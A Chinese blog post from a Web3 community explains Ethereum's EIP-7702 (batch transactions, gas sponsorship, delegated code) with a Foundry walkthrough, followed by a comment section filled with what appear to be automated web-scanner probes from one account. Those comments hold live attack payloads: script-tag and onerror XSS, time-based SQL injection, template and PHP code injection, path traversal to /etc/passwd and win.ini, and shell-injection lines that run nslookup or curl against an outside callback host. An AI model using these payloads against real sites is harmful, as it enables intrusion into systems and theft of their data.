The Web3 是一个专注 Web3 技术解决方案设计与开发、技术教程设计与开发、Web3 项目投研分析和 Web3 项目孵化，旨在将开发者，创业者，投资者和项目方联系在一起的社区

Pectra 升级的核心：EIP-7702的原理分析和实操

分类： Ehtereum 作者：牛仔裤浏览：1278 2025-04-20 05:31:33

什么是 EIP-7702

EIP-7701 是以太坊 Pectra 升级的内容之一。是一种新的交易类型（ 0x4 ）。提高了以太坊的账号抽象的能力，支持直接使用 EOA 账号去执行临时智能合约。可以实现批量交易、gas 代付等能力，这将会在钱包开发中起到很大作用。

EIP-7702 的能力

批量交易：可以在一次 EOA 账号发起交易时，发送多次交易。（非 EIP-7702 类型的 EOA 账号一次只能发送一笔交易）
gas 代付：允许第三方（例如接收方或代理机构）为你支付本次交易的 gas 费用。（原始 EOA 交易没有 gas 代付能力）
安全访问：授予临时的对合约的访问，用完后 EOA 账号恢复成为普通账号。调用时无须暴露私钥。
合约共享：逻辑合约可以共享，只需部署一次，便可提供给多个 EOA 账号使用。逻辑合约可永久存在链上（临时合约用完即毁）。

EIP-7702 在钱包场景下的作用

可以用在交易所钱包的 归集 操作上。传统的以太坊 EOA 账号进行归集操作，从用户地址发送到归集地址，只能一笔一笔进行归集，并且需要交易所下发一笔小额资金作为归集 gas 费用。效率十分低下且存在粉尘资金增多、额外消耗 gas 的问题。而采用 EIP-7702 的新交易类型，可以在共用 EOA 账号的同时，平滑升级到支持批量归集、gas 代付的能力。

EIP-7702 实现的核心原理

签名授权 EOA 账号在签名时候，签订一个授权信息，内容包括 链 ID、nonce、委托地址、EIP-712 的签名。这个授权信息供验证者节点打包交易时，从委托地址中查出运行代码，然后附加到 EOA 账号中。

- 临时代码注入 节点收到 EOA 账号发送的交易后，验证 EOA 账号的签名，从链上读取委托合约的 bytecode 然后临时注入到 EOA 账号的地址上。
自动代码卸载 在交易执行完后，该地址又会变回普通 EOA 地址，EXTCODEHASH(address) == 0x0。代码区会变回 0。且状态不会存储到链上，确保不存在污染。

EIP-7702 实操及流程解析

git clone https://github.com/quiknode-labs/qn-guide-examples.git
cd qn-guide-examples/ethereum/eip-7702

安装依赖 安装 forge 库和 OZ 代码库

forge install foundry-rs/forge-std
forge install OpenZeppelin/openzeppelin-contracts

启动 anvil 注意，在未完全升级之前，必须携带--hardfork prague 参数，否则无法执行。

anvil --hardfork prague

使用 script 部署合约

❯ forge script script/BatchCallAndSponsor.s.sol \
  --rpc-url http://127.0.0.1:8545 \
  --broadcast \
  --tc BatchCallAndSponsorScript -vvvv

观察到以下结果，代码部署成功。 6. 观察日志 - performDirectExecution() 批量转账日志观察

- performSponsoredExecution() gas 代付日志观察

6. 部署流程解析 - 原始 EOA 转账 首先来分析一下没有 EIP-7702 的原始转账情况，用户 A 通过离线签名，将交易发送到以太坊 RPC 节点，在通过对用户 A 的签名认证之后，可以将交易广播到以太坊网络。此时，交易只能一笔一笔的发送，且无 gas 代付能力。

performDirectExecution() 批量转账 而在使用了 EIP-7702 后，交易流程发生了变化。首先，我们来看一个总的执行图。后面再回去根据代码分析。

1. 在这个执行图中（A 代指 Alice，B 代指 Bob），EOA 账户 Alice 离线发起委托签名，签名时，将委托的逻辑合约包含在其中，发送给以太坊 RPC 节点。

![image.png](https://img.learnblockchain.cn/attachments/2025/04/Nk5ilkKQ68047cd0a9dee.png)

然后，RPC 节点经过验证签名有效后，读取这个逻辑合约的字节码，注入给 EOA 用户 Alice。此时，用户 Alice 从一个 EOA 账户升级成为一个临时合约账户（合约的地址和用户 Alice 的地址一致），可以执行合约的逻辑（批量转账等）
在此处 Alice 的临时合约中，因为合约的调用者是 Alice，无须对 Alice 进行验签处理，使用 require(msg.sender == address(this)) 即可完成签名的验证。
此外，由于发送给 RPC 节点时 from 地址为 Alice，to 地址也为 Alice。在此过程中，Alice 为合约账户，属于合约内部交易，所以这条记录不会被记录在以太坊的交易记录中。
最后，这个账户就拥有了合约的调用能力，其中的交易给 Bob 的两笔交易（ETH 和 ERC20 代币）都通过 B.call()的方式进行发送到以太坊网络中。（from 地址为 Alice，to 地址为 Bob，from 地址属于合约地址，to 地址属于 EOA 地址，属合约内部交易，故也不存在交易记录中）

- performSponsoredExecution() gas 代付

![image.png](https://img.learnblockchain.cn/attachments/2025/04/jPWUZ6gc6804768f7da6c.png)
`gas` 代付的情况相对于普通批量转账的场景而言，稍微复杂与一点。可以分为以下几步：
1. **Alice 构造委托合约，并签名**：
![image.png](https://img.learnblockchain.cn/attachments/2025/04/O9z63gLv68047ea636c22.png)
2. **Bob 持有 Alice 的数据，并签名**：
![image.png](https://img.learnblockchain.cn/attachments/2025/04/MQ09Dfrq68047f02cc427.png)
3. **Bob 发送交易到 RPC 节点**：

![image.png](https://img.learnblockchain.cn/attachments/2025/04/bLiUK24Q68047f58ec0dd.png)

4. `RPC` 节点对 `Bob` 进行验签，通过后读取 `Alice` 委托的逻辑合约代码，注入到 `Alice` 的地址中。然后广播交易。此时，用户 `Alice` 从一个 `EOA` 账户升级成为一个临时合约账户（合约的地址和用户 `Alice` 的地址一致），可以执行合约的逻辑（批量转账等）

 5. 并且，由于在这种 `gas` 代付的方案中，交易的发起者是 `Bob`，所以 `RPC` 节点在进行验签的时候，只会验证 `Bob` 的签名，`Alice` 的签名并不会去处理。在合约中，没办法像上面批量交易那样使用 `require(msg.sender == address(this))` 故我们临时合约中还需要去验证 `Alice` 的签名，以防止伪造交易的情况出现。

![image.png](https://img.learnblockchain.cn/attachments/2025/04/zFru4hLj68047facb70cb.png)

6.  此外，由于发送给 `RPC` 节点时，发送者 `from` 为 `Bob`，接受者 `to` 地址为 `Alice`，`Bob` 是一个 `EOA` 账户，`Alice` 为一个合约账户，故这笔交易记录会被记录上。  
  ![image.png](https://img.learnblockchain.cn/attachments/2025/04/6Lio6sv068047942d73ca.png)
 7. 但是，由于在 `Alice` 合约内部，发生了从 `Alice` 转账给 `Tom`（也可以是 `Bob`） 的情况，`Alice` 属于合约地址，`Tom`（`Bob`） 属EOA 地址，属合约内部交易，故这笔记录也不会存在以太坊的交易记录中。

全部评论（192）

小问 2025-06-06 07:42:02

### ~~1.

小问 2025-06-06 07:41:52

小问 2025-06-06 07:41:25

### ~~1.

小问 2025-06-06 07:41:06

1<aY0Qesj<

小问 2025-06-06 07:41:05

### ~~1.

小问 2025-06-06 07:41:01

1<img sRc='http://attacker-9358/log.php?

小问 2025-06-06 07:40:55

1<a5LaCK4 x=9544>

小问 2025-06-06 07:40:50

1<ifRAme sRc=9548.com></IfRamE>

小问 2025-06-06 07:40:39

### ~~1.

小问 2025-06-06 07:40:38

1<WUY8ZQ>GMYJG[!+!]</WUY8ZQ>

小问 2025-06-06 07:40:37

### ~~1.

小问 2025-06-06 07:40:36

### ~~1.

小问 2025-06-06 07:40:34

### ~~1.

小问 2025-06-06 07:40:33

### ~~1.

小问 2025-06-06 07:40:32

1wJ5cb <ScRiPt >I9Qz(9991)</ScRiPt>

小问 2025-06-06 07:40:31

### ~~1.

小问 2025-06-06 07:40:23

1}body{zzz:Expre/**/SSion(I9Qz(9539))}

小问 2025-06-06 07:40:15

小问 2025-06-06 07:40:09

小问 2025-06-06 07:40:04

### ~~1.

小问 2025-06-06 07:40:03

1<input autofocus onfocus=I9Qz(9174)>

小问 2025-06-06 07:39:55

�<img zzz onmouseover=I9Qz(97971) //�>

小问 2025-06-06 07:39:44

1<ScRiPt>I9Qz(9290)</sCripT>

小问 2025-06-06 07:39:41

@@O4sac

小问 2025-06-06 07:39:35

1\u003CScRiPt\I9Qz(9207)\u003C/sCripT\u003E

小问 2025-06-06 07:39:31

%31%3C%53%63%52%69%50%74%20%3E%49%39%51%7A%289315%29%3C%2F%73%43%72%69%70%54%3E

小问 2025-06-06 07:39:29

1'"

小问 2025-06-06 07:39:27

### ~~1. '||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

小问 2025-06-06 07:39:23

1<img/src=">" onerror=alert(9808)>

小问 2025-06-06 07:39:13

1<img src=xyz OnErRor=I9Qz(9588)>

小问 2025-06-06 07:39:08

1<img src=//xss.bxss.me/t/dot.gif onload=I9Qz(9557)>

小问 2025-06-06 07:39:02

1<body onload=I9Qz(9367)>

小问 2025-06-06 07:38:58

rKLDq89J')) OR 742=(SELECT 742 FROM PG_SLEEP(15))--

小问 2025-06-06 07:38:54

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9012'>

小问 2025-06-06 07:38:50

555

小问 2025-06-06 07:38:48

555

小问 2025-06-06 07:38:46

555

小问 2025-06-06 07:38:44

1<isindex type=image src=1 onerror=I9Qz(9215)>

小问 2025-06-06 07:38:44

555

小问 2025-06-06 07:38:35

GUZfBVQa') OR 842=(SELECT 842 FROM PG_SLEEP(15))--

小问 2025-06-06 07:38:22

1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9622></ScRiPt>

小问 2025-06-06 07:38:21

555

小问 2025-06-06 07:38:16

1<ScRiPt >I9Qz(9617)</ScRiPt>

小问 2025-06-06 07:38:10

agIbeVfn' OR 773=(SELECT 773 FROM PG_SLEEP(15))--

小问 2025-06-06 07:38:07

1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%49%39%51%7A%28%39%36%30%35%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

小问 2025-06-06 07:38:01

555

小问 2025-06-06 07:38:00

1<script>I9Qz(9558)</script>

小问 2025-06-06 07:37:56

1<WWJFD5>IPXUF[!+!]</WWJFD5>

小问 2025-06-06 07:37:52

1<ScRiPt >I9Qz(9496)</ScRiPt>

小问 2025-06-06 07:37:47

xMxXJFti'; waitfor delay '0:0:15' --

小问 2025-06-06 07:37:45

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

小问 2025-06-06 07:37:35

555

小问 2025-06-06 07:37:34

dfb__${98991*97996}__::.x

小问 2025-06-06 07:37:20

dfb[[${98991*97996}]]xca

小问 2025-06-06 07:37:18

1 waitfor delay '0:0:15' --

小问 2025-06-06 07:37:12

dfb{{98991*97996}}xca

小问 2025-06-06 07:37:03

555

小问 2025-06-06 07:36:57

小问 2025-06-06 07:36:47

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

小问 2025-06-06 07:36:42

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

小问 2025-06-06 07:36:38

小问 2025-06-06 07:36:29

555

小问 2025-06-06 07:36:24

<th:t="${dfb}#foreach

小问 2025-06-06 07:36:17

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

小问 2025-06-06 07:36:14

555

小问 2025-06-06 07:36:13

小问 2025-06-06 07:36:02

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

小问 2025-06-06 07:35:58

555

小问 2025-06-06 07:35:54

<%={{={@{#{${dfb}}%>

小问 2025-06-06 07:35:45

if(now()=sysdate(),sleep(15),0)

小问 2025-06-06 07:35:40

555

小问 2025-06-06 07:35:35

bfgx4484%C0%BEz1%C0%BCz2a%90bcxhjl4484

小问 2025-06-06 07:35:30

-1" OR 2+22-22-1=0+0+0+1 --

小问 2025-06-06 07:35:28

-1' OR 2+813-813-1=0+0+0+1 or 'v6w0gNON'='

小问 2025-06-06 07:35:28

555

小问 2025-06-06 07:35:26

-1' OR 2+916-916-1=0+0+0+1 --

小问 2025-06-06 07:35:22

-1 OR 2+629-629-1=0+0+0+1

小问 2025-06-06 07:35:20

-1 OR 2+933-933-1=0+0+0+1 --

小问 2025-06-06 07:35:18

### ~~1.

小问 2025-06-06 07:35:15

bfg2853%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl2853

小问 2025-06-06 07:35:12

555

小问 2025-06-06 07:35:08

555

小问 2025-06-06 07:35:05

555

小问 2025-06-06 07:35:02

19237314

小问 2025-06-06 07:35:02

555

小问 2025-06-06 07:35:00

555

小问 2025-06-06 07:34:58

555

小问 2025-06-06 07:34:56

### ~~1.

小问 2025-06-06 07:34:50

'"()&%<zzz><ScRiPt >I9Qz(9339)</ScRiPt>

小问 2025-06-06 07:34:31

1'"()&%<zzz><ScRiPt >I9Qz(9678)</ScRiPt>

小问 2025-06-06 07:34:30

555

小问 2025-06-06 07:34:28

### ~~1.

小问 2025-06-06 07:34:26

'.print(md5(31337)).'

小问 2025-06-06 07:34:23

### ~~1.

小问 2025-06-06 07:34:22

${@print(md5(31337))}\

小问 2025-06-06 07:34:21

<!--

小问 2025-06-06 07:34:19

### ~~1.

小问 2025-06-06 07:34:18

${@print(md5(31337))}

小问 2025-06-06 07:34:17

小问 2025-06-06 07:34:16

### ~~1.

小问 2025-06-06 07:34:15

";print(md5(31337));$a="

小问 2025-06-06 07:34:12

';print(md5(31337));$a='

小问 2025-06-06 07:34:07

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

小问 2025-06-06 07:34:05

xfs.bxss.me

小问 2025-06-06 07:33:59

@@3Jznu

小问 2025-06-06 07:33:52

### ~~1.

小问 2025-06-06 07:33:51

WEB-INF\web.xml

小问 2025-06-06 07:33:50

"||sleep(27*1000)*wbybvx||"

小问 2025-06-06 07:33:44

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

小问 2025-06-06 07:33:43

WEB-INF/web.xml

小问 2025-06-06 07:33:42

'||sleep(27*1000)*xykugc||'

小问 2025-06-06 07:33:40

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

小问 2025-06-06 07:33:39

"&&sleep(27*1000)*rvrwtb&&"

小问 2025-06-06 07:33:38

1'"

小问 2025-06-06 07:33:36

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

小问 2025-06-06 07:33:36

'&&sleep(27*1000)*vaddyd&&'

小问 2025-06-06 07:33:35

555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

小问 2025-06-06 07:33:32

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

小问 2025-06-06 07:33:32

'"()

小问 2025-06-06 07:33:29

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

小问 2025-06-06 07:33:29

'+'A'.concat(70-3).concat(22*4).concat(103).concat(67).concat(105).concat(73)+(require'socket' Socket.gethostbyname('hitfj'+'qrhpisrb59ae6.bxss.me.')[3].to_s)+'

小问 2025-06-06 07:33:28

### ~~1.

小问 2025-06-06 07:33:27

bxss.me/t/xss.html?%00

小问 2025-06-06 07:33:26

..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini

小问 2025-06-06 07:33:26

"+"A".concat(70-3).concat(22*4).concat(113).concat(70).concat(112).concat(76)+(require"socket" Socket.gethostbyname("hitsj"+"fkmhmttb8ec93.bxss.me.")[3].to_s)+"

小问 2025-06-06 07:33:22

HttP://bxss.me/t/xss.html?%00

小问 2025-06-06 07:33:22

..\..\..\..\..\..\..\..\windows\win.ini

小问 2025-06-06 07:33:20

;(nslookup -q=cname hithqepybanql2733d.bxss.me||curl hithqepybanql2733d.bxss.me)|(nslookup -q=cname hithqepybanql2733d.bxss.me||curl hithqepybanql2733d.bxss.me)&(nslookup -q=cname hithqepybanql2733d.bxss.me||curl hithqepybanql2733d.bxss.me)

小问 2025-06-06 07:33:20

%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini

小问 2025-06-06 07:33:18

555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

小问 2025-06-06 07:33:17

`(nslookup -q=cname hitlohaiaaeot756de.bxss.me||curl hitlohaiaaeot756de.bxss.me)`

小问 2025-06-06 07:33:16

/../../../../../../../../../../boot.ini

小问 2025-06-06 07:33:15

^(#$!@#$)(()))******

小问 2025-06-06 07:33:14

|(nslookup -q=cname hitrgwombyagve4762.bxss.me||curl hitrgwombyagve4762.bxss.me)

小问 2025-06-06 07:33:14

../../../../../../../../../../windows/win.ini%00.jpg

小问 2025-06-06 07:33:12

!(()&&!|*|*|

小问 2025-06-06 07:33:12

### ~~1.

小问 2025-06-06 07:33:11

C:\WINDOWS\system32\drivers\etc\hosts

小问 2025-06-06 07:33:11

&(nslookup -q=cname hitzujsgofnudf62f8.bxss.me||curl hitzujsgofnudf62f8.bxss.me)&'\"`0&(nslookup -q=cname hitzujsgofnudf62f8.bxss.me||curl hitzujsgofnudf62f8.bxss.me)&`'

小问 2025-06-06 07:33:09

)

小问 2025-06-06 07:33:08

/WEB-INF/web.xml

小问 2025-06-06 07:33:08

&nslookup -q=cname hitcgenjlqirh8f1c1.bxss.me&'\"`0&nslookup -q=cname hitcgenjlqirh8f1c1.bxss.me&`'

小问 2025-06-06 07:33:08

".gethostbyname(lc("hitcu"."wpmwieaze428c.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(89).chr(111).chr(85)."

小问 2025-06-06 07:33:07

bxss.me

小问 2025-06-06 07:33:07

/\../\../\../\../\../\../\../etc/passwd

小问 2025-06-06 07:33:06

$(nslookup -q=cname hitzvncbblyer95f72.bxss.me||curl hitzvncbblyer95f72.bxss.me)

小问 2025-06-06 07:33:06

'.gethostbyname(lc('hitzj'.'cylusuuu32ce5.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(68).chr(111).chr(86).'

小问 2025-06-06 07:33:05

ShLZxehq')) OR 200=(SELECT 200 FROM PG_SLEEP(15))--

小问 2025-06-06 07:33:04

c:/windows/win.ini

小问 2025-06-06 07:33:04

file:///etc/passwd

小问 2025-06-06 07:33:04

(nslookup -q=cname hitspzdddnmem76446.bxss.me||curl hitspzdddnmem76446.bxss.me))

小问 2025-06-06 07:33:02

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

小问 2025-06-06 07:33:02

/etc/shells

小问 2025-06-06 07:33:02

|echo ocmdoe$()\ xcpcdn\nz^xyu||a #' |echo ocmdoe$()\ xcpcdn\nz^xyu||a #|" |echo ocmdoe$()\ xcpcdn\nz^xyu||a #

小问 2025-06-06 07:33:00

..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd

小问 2025-06-06 07:33:00

http://bxss.me/t/fit.txt%3F.jpg

小问 2025-06-06 07:32:59

&echo ooxbkv$()\ oksfgy\nz^xyu||a #' &echo ooxbkv$()\ oksfgy\nz^xyu||a #|" &echo ooxbkv$()\ oksfgy\nz^xyu||a #

小问 2025-06-06 07:32:57

../././../././../././../././../././../././../././../././../././../././etc/passwd

小问 2025-06-06 07:32:57

Http://bxss.me/t/fit.txt

小问 2025-06-06 07:32:57

echo kdahtv$()\ aziluh\nz^xyu||a #' &echo kdahtv$()\ aziluh\nz^xyu||a #|" &echo kdahtv$()\ aziluh\nz^xyu||a #

小问 2025-06-06 07:32:56

### ~~1.

小问 2025-06-06 07:32:55

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

小问 2025-06-06 07:32:55

1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg

小问 2025-06-06 07:32:53

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

小问 2025-06-06 07:32:52

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg

小问 2025-06-06 07:32:52

&n967321=v993152

小问 2025-06-06 07:32:51

/.././.././.././.././.././.././.././../etc/./passwd%00

小问 2025-06-06 07:32:49

